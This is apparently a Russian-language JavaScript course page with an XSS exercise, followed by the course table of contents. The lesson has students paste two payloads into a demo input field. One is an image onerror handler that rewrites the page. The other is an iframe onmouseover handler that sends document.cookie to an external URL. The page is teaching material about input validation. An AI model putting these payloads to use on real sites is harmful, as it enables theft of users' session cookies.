-
Notifications
You must be signed in to change notification settings - Fork 16
XSS
XSS ( Cross-Site Scripting — «межсайтовый скриптинг» ) — атака на веб-систему путем инъекции вредоносного кода
( вместо "C" используется "X", чтобы не было путаницы с CSS )
Внедренный код будет выполняться на компьютере пользователя
Код может пересылать конфиденциальные данные пользователя веб-серверу хакера
Разновидностей XSS-атак очень много
Частично они отражаются на уровне браузера
В данном примере мы будем внедрять код при вводе пользовательских данных
и использовать обработчиков событий элементов для запуска внедренного кода
[:link: Перейдите по ссылке](https://garevna.github.io/js-samples/#03 target="_blank")
Откройте Chrome DevTools
Установите точки останова ( breakpoints ) для того, чтобы пошагово отслеживать выполнение кода и вносить изменения в код
- Скопируйте код ниже и вставьте его в поле ввода элемента input:
<IMG SRC="images/hack.png" onerror="document.write ( String.fromCharCode ( 88, 83, 83) )"/>это довольно безобидная "атака", которая просто перезапишет содержимое body
- Скопируйте код ниже и вставьте его в поле ввода элемента input:
<IFRAME SRC=js/attack.html
onmouseover="window.open ( 'https://garevna.github.io/js-samples/js/attack.html#' + document.cookie, '_self' )">
</IFRAME>( с помощью такой строки можно украсть куки с компьютера пользователя, где хранится конфиденциальная информация о нем )
Обратите внимание, что вместо ссылки ☕ https://garevna.github.io/js-samples/js/attack.html
в реальной атаке будет ссылка на сайт ( страницу ) хакера
В панели навигации откройте файл js/index03.js
Обратите внимание на функцию валидации ввода пользователя ( testUserText )
В случае XSS атаки функция должна заменить текст, введенный пользователем, на сообщение: "XSS атака отражена" с указанием текущей даты и времени
© Irina H.Fylyppova 2018
Использование данных материалов или любой их части коммерческими школами ( курсами ) является нарушением авторских прав
| 1 | 2 | 3 | 4 | 5 |
| 6 | 7 | 8 | 9 | 10 |
| 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 |
| ⏬ |
|---|
- Блок-схема алгоритма
- Developer Tools
- Chrome DevTools
- Переменные
- Оператор typeof
- Структуры данных
- Операторы присваивания
- Логические выражения
- Условные операторы
- Инкремент
- Свойство length
- Оператор цикла for
- UTF-8
Homework
- Приведение типов
- NaN | null | Infinity
- BigInt (ES10)
- Функции
- Методы
- Методы строк
- Методы массивов
- Date ()
Самостоятельная работа
Практика (XSS)
Homework
- Циклы while и do...while
- Циклы for...of и for...in
- Параметры по умолчанию
- Объект function
Практика
Homework
- Нативные и host-объекты
- Литерал объекта
- Унаследованные свойства
- Конструктор
- Модель наследования
- Публичные и приватные свойства
- Оператор in
1
Homework
- Итерирующие методы массивов
- Тестирование производительности
- SHA
Homework
- Размеры и прокрутка элемента
- Event Loop
- async | await
- API
- REST | HATEOAS
- status codes
JSON placeholder-
JSON server
fake chat
Homework
- strict mode
- Вычисляемые имена свойств
- Краткий синтаксис методов
- Краткий литерал объекта
- Классы
Homework
- :not(:defined)
- Shadow DOM
- Custom elements
- Lifecycle hooks
- whenDefined
- <template>
- slot
1
2
3
Homework
- npm
- webpack
Упражнение 1- ES6 модули
Упражнение 2- --mode | --watch
Упражнение 3
Упражнение 4
Упражнение 5
Упражнение 6
Упражнение 7
Упражнение 8
Homework
| ⏫ |
|---|

Дополнительно
Справочная инфо
Git Bush
TCP/IP
Коды символов